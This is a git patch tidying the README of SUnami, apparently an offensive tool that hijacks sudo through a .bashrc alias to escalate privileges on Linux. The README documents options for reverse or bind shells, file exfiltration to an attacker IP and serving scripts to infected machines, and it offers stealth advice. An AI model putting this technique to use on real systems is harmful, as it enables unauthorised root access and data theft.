From 6e882174f3343e02a733183433bc8ead68be43d9 Mon Sep 17 00:00:00 2001 From: alchemist Date: Wed, 9 Aug 2023 19:38:18 +0300 Subject: [PATCH] made readme cleaner --- README.md | 73 ++++++++++++++++++++++++++++--------------------------- 1 file changed, 37 insertions(+), 36 deletions(-) diff --git a/README.md b/README.md index f303a93..fba9989 100644 --- a/README.md +++ b/README.md @@ -1,54 +1,55 @@ # SUnami - Struggling with linux priveledge escelation? well then its time to cheese it with SUnami. - 0 interaction privesc is always recommended but not always achievable. For this reason we have created a tool for the most trivial priv esc in history (with a few drawbacks). - This is not an exploit just a cheap but effective trick. The usecase is when you have a shell on a sudoers account but no sudo cred. - It works by manipulating sudo via aliasing in their .bashrc file to prepend a malicious attacker specified command first in the background. - This does mean you will need to wait for sudo to be executed. - flags denoted with -- are required. with - optional. - the -local flag denotes that you want sunami to modify the .bashrc file on the current machine instead of producing output (not suggested for stealth reasons). + Struggling with linux privilege escalation? Well then, it's time to cheese it with SUnami. + + 0 interaction privesc is always desired but not always achievable. For this reason, we have created a tool for the most trivial non-0-interactin priv esc in history (with a few drawbacks). This is not an exploit just a cheap but effective trick. The usecase is when you have a shell on a sudoers account but no sudo cred. + + It works by manipulating sudo via aliasing in their .bashrc file to prepend a malicious attacker specified command first in the background. This does mean you will need to wait for sudo to be executed. + + Flags denoted with -- are required. Flags denoted with - are optional. The -local flag denotes that you want sunami to modify the .bashrc file on the current machine instead of producing output (not suggested for stealth reasons). + # Authors witchdocsec, TheA1ch3m1st + # Notice using the shells and socket based exfil will throw an error in the targets shell if your listener isn't active. be sure to clean up after gaining root. For the most stealth with file exfil we suggest the built in flask server. Currently our built in listener works best with bash shells. for nc shells using ncs own listener is recommended. # File Exfiltration -I used passwd so as not to leak my hash for this demo but rest assured you can read whatever file you wish +I used passwd so as not to leak my hash for this demo but rest assured you can read whatever file you wish. ![image](https://github.com/witchdocsec/SUnami/assets/107813117/a7f26322-5fca-4030-9725-13dc5a02ac44) -## useage: +## Usage sunami.py [-local {1,0}] exfilfile [--file FILE] [--method {postflask,nc,pysocket}] [--ip IP] [--port PORT] # Root Shell ![image](https://github.com/witchdocsec/SUnami/assets/107813117/06000a59-b7da-45f3-8258-89618aa02a1f) -## useage: +## Usage sunami.py [-local {1,0}] genshell [--ip IP] [--port PORT] [-shell SHELL] [-protocol PROTOCOL] [-listen {1,0}] # Run From Server ![image](https://github.com/witchdocsec/SUnami/assets/107813117/91127128-64e1-4493-bf85-068bc3a04972) -## useage +## Usage sunami.py [-local {1,0}] rfs [-h] --ip IP --port PORT --file FILE [--vars VARS [VARS ...]] [--schema SCHEMA] -# help -genshell generates the shell to be edited in the bashrc file as an alias - --ip ip to connect to - --port port to connect to - --shelltype type of shell to use (reverse, bind) - default is reverse - --shell type of shell to generate - default is bash - reverse bash, nc, nce - bind nc - -protocol type of protocol, will not affect most shells (tcp, udp) - default is tcp - -listen will automatically run a listener after outputting the shell (1, 0) - usage: sunami.py genshell [-h] [--ip IP] [--port PORT] [--shelltype SHELLTYPE] [--shell SHELL] [-protocol PROTOCOL] [-listen] +# Help +genshell generates the shell to be edited in the bashrc file as an alias + --ip ip to connect to + --port port to connect to + --shelltype type of shell to use (reverse, bind) - default is reverse + --shell type of shell to generate - default is bash + reverse bash, nc, nce + bind nc + -protocol type of protocol, will not affect most shells (tcp, udp) - default is tcp + -listen will automatically run a listener after outputting the shell (1, 0) + usage: sunami.py genshell [-h] [--ip IP] [--port PORT] [--shelltype SHELLTYPE] [--shell SHELL] [-protocol PROTOCOL] [-listen] -exfilfile exfiltrates files using several methods - --file file to exfiltrate - --method method to use (postflask, nc, pysocket) - --ip ip to send to - --port port to send to - usage: sunami.py exfilfile [-h] [--file FILE] [--method {postflask,nc,pysocket}] [--ip IP] [--port PORT] - -rfs runs flask server serving your sh files to run from the attacker machine - --ip ip to run server on - --port port to run server on - --file file to run on infected machine - --vars : - sets variables in the selected script using jinja2 template syntax - default is no variables - --schema schema to use (http, https) - default http - useage: sunami.py rfs [-h] --ip IP --port PORT --file FILE [--vars VARS [VARS ...]] [--schema SCHEMA] +exfilfile exfiltrates files using several methods + --file file to exfiltrate + --method method to use (postflask, nc, pysocket) + --ip ip to send to + --port port to send to + usage: sunami.py exfilfile [-h] [--file FILE] [--method {postflask,nc,pysocket}] [--ip IP] [--port PORT] +rfs runs flask server serving your sh files to run from the attacker machine + --ip ip to run server on + --port port to run server on + --file file to run on infected machine + --vars : - sets variables in the selected script using jinja2 template syntax - default is no variables + --schema schema to use (http, https) - default http + usage: sunami.py rfs [-h] --ip IP --port PORT --file FILE [--vars VARS [VARS ...]] [--schema SCHEMA] \ No newline at end of file